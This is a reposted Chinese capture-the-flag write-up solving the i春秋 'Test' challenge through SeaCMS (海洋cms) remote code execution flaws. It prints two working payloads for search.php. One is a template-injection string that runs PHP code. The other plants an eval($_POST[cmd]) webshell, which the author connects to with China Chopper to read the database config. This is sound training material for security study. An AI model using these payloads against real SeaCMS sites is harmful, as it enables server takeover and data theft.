码迷,mamicode.com
首页 > 其他好文 > 详细

i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)

时间:2018-10-14 16:41:48      阅读:324      评论:0      收藏:0      [点我收藏+]

标签:hpa   val   shel   let   系统   http   fda   技术   文件的   

打开发现是海洋cms,那就搜索相关漏洞

技术分享图片

 

找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49

直接利用其中给出的poc

/search.php

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

技术分享图片

 

可以执行系统命令

技术分享图片

 

 

没找到flag,考虑可能在数据库中,想上传一句话,然后用菜刀查数据库来着,但是没有写文件的权限,手动查数据库感觉太麻烦,所以换个exp

海洋cms v6.28命令执行漏洞 : https://www.uedbox.com/seacms-v628-0day/

/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

菜刀直接连接

找了好久终于找到数据库配置文件

技术分享图片

编辑该条shell配置如下

技术分享图片

技术分享图片

 

最后得到flag

技术分享图片

i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)

标签:hpa   val   shel   let   系统   http   fda   技术   文件的   

原文地址:https://www.cnblogs.com/leixiao-/p/9786034.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!